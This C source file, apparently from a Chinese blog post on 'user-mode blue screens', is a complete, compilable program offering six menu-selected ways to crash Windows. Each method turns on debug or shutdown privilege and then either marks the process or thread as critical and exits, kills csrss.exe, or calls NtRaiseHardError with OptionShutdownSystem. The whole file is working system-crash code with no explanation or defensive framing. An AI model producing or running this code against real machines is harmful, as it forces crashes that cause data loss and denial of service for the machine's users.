#include <stdio.h>
#include <windows.h>
typedef enum _HARDERROR_RESPONSE_OPTION {
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem
} HARDERROR_RESPONSE_OPTION, *PHARDERROR_RESPONSE_OPTION;
typedef enum _HARDERROR_RESPONSE {
ResponseReturnToCaller,
ResponseNotHandled,
ResponseAbort,
ResponseCancel,
ResponseIgnore,
ResponseNo,
ResponseOk,
ResponseRetry,
ResponseYes
} HARDERROR_RESPONSE, *PHARDERROR_RESPONSE;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
//-------------------------------------
typedef void (__stdcall *SETP)(HANDLE a, ULONG b, PVOID c, ULONG d);
typedef void (__stdcall *SETT)(HANDLE, ULONG, PVOID, ULONG);
typedef void (__stdcall *ER)(ULONG, ULONG, PUNICODE_STRING, PVOID, HARDERROR_RESPONSE_OPTION, OUT PHARDERROR_RESPONSE);
typedef void (__stdcall *setp)(BOOLEAN, PBOOLEAN, BOOLEAN);
typedef void (__stdcall *sett)(BOOLEAN, PBOOLEAN, BOOLEAN);
typedef BOOL (__stdcall *PR)(ULONG, BOOL, BOOL, PBOOLEAN);
typedef BOOL(__stdcall *Csr)(void);
typedef int(*add) (int a, int b);
//------------------------------------
SETP NtSetInformationProcess;
SETT NtSetInformationThread;
ER NtRaiseHardError;
setp RtlSetProcessIsCritical;
sett RtlSetThreadIsCritical;
PR RtlAdjustPrivilege;
Csr CsrGetProcessId;
const ULONG SE_DEBUG_PRIVILEGE = 20;
const ULONG SE_SHUTDOWN_PRIVILEGE = 19;
const int ProcessBreakOnTermination = 0x1D;
const int ThreadBreakOnTermination = 0x12;
void CallOpenProcess(void);
void CallRtlSetThreadIsCritical(void);
void CallRtlSetProcessIsCritical(void);
void CallNtSetInformationThread(void);
void CallNtSetInformationProcess(void);
void CallNtRaiseHardError(void);
/*提取失败右键以管理员权限运行*/
int main(void)
{
NtSetInformationProcess = (SETP)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "NtSetInformationProcess");
NtSetInformationThread = (SETT)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "NtSetInformationThread");
RtlSetProcessIsCritical = (setp)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "RtlSetProcessIsCritical");
RtlSetThreadIsCritical = (sett)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "RtlSetThreadIsCritical");
RtlAdjustPrivilege = (PR)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "RtlAdjustPrivilege");
RtlSetThreadIsCritical = (sett)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "RtlSetThreadIsCritical");
NtRaiseHardError = (ER)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "NtRaiseHardError");
CsrGetProcessId = (Csr)GetProcAddress(GetModuleHandleW(TEXT("ntdll")), "CsrGetProcessId");
int d = 0;
scanf("%d", &d);
switch (d)
{
case 1:
CallOpenProcess();
break;
case 2:
CallRtlSetThreadIsCritical();
break;
case 3:
CallRtlSetProcessIsCritical();
break;
case 4:
CallNtSetInformationThread();
break;
case 5:
CallNtSetInformationProcess();
break;
case 6:
CallNtRaiseHardError();
break;
default:
printf("输入不正确\n");
break;
}
getchar();
getchar();
return 0;
}
void CallNtRaiseHardError(void)
{
HARDERROR_RESPONSE OR;
HARDERROR_RESPONSE_OPTION OP;
BOOLEAN B;
OR = ResponseYes;
OP = OptionShutdownSystem;
if (RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE, &B) == 0)
{
NtRaiseHardError(0xC0000217, 0, 0, 0, OptionShutdownSystem, &OR);
}
else
{
MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
}
return;
}
void CallNtSetInformationProcess(void)
{
BOOLEAN B;
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &B) == 0)
{
ULONG A = 1;
NtSetInformationProcess(GetCurrentProcess(), ProcessBreakOnTermination, &A, sizeof(ULONG));
ExitProcess(0);
}
else
{
MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
}
return;
}
void CallNtSetInformationThread(void)
{
BOOLEAN B;
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &B) == 0)
{
ULONG A = 1;
NtSetInformationThread(GetCurrentThread(), ThreadBreakOnTermination, &A, sizeof(ULONG));
ExitProcess(0);
}
else
{
MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
}
return;
}
void CallRtlSetProcessIsCritical(void)
{
BOOLEAN B;
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &B) == 0)
{
RtlSetProcessIsCritical(TRUE, NULL, FALSE);
ExitProcess(0);
}
else
{
MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
}
return;
}
void CallRtlSetThreadIsCritical(void)
{
BOOLEAN B;
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &B) == 0)
{
RtlSetThreadIsCritical(TRUE, NULL, FALSE);
ExitProcess(0);
}
else
{
MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
}
return;
}
void CallOpenProcess(void)
{
BOOLEAN B;
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &B) == 0)
{
HANDLE PHD;
PHD = OpenProcess(PROCESS_ALL_ACCESS, FALSE, CsrGetProcessId());
TerminateProcess(PHD, 0);
}
else
{
MessageBoxW(0, TEXT("提权失败无法蓝屏"), TEXT("提权失败无法蓝屏"), 0);
}
return;
}
应用层蓝屏
最新推荐文章于 2023-04-23 19:41:29 发布